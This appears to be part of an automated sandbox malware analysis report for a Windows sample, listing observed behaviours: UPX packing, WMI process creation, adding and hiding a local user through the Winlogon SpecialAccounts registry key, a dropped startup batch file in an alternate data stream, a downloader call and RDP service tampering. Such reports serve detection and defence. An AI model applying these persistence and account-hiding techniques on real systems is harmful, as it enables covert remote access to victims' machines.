          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00408010 push ecx; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0041C352 pushad ; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0041D355 push esi; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0041C33A push esp; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D11190 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D11190 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Creates processes via WMI
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1D418 NetUserAdd,NetLocalGroupAddMembers,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData\images.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData\images.exeJump to dropped file
          Source: C:\ProgramData\images.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,

          Boot Survival

          barindex
          Drops script or batch files to the startup folder
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
          Source: C:\ProgramData\images.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior
          Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

          Hooking and other Techniques for Hiding and Protection

          barindex
          Contains functionality to hide user accounts
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Hides user accounts
          Source: C:\ProgramData\images.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList GEAzbtFJump to behavior
          Creates files in alternative data streams (ADS)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
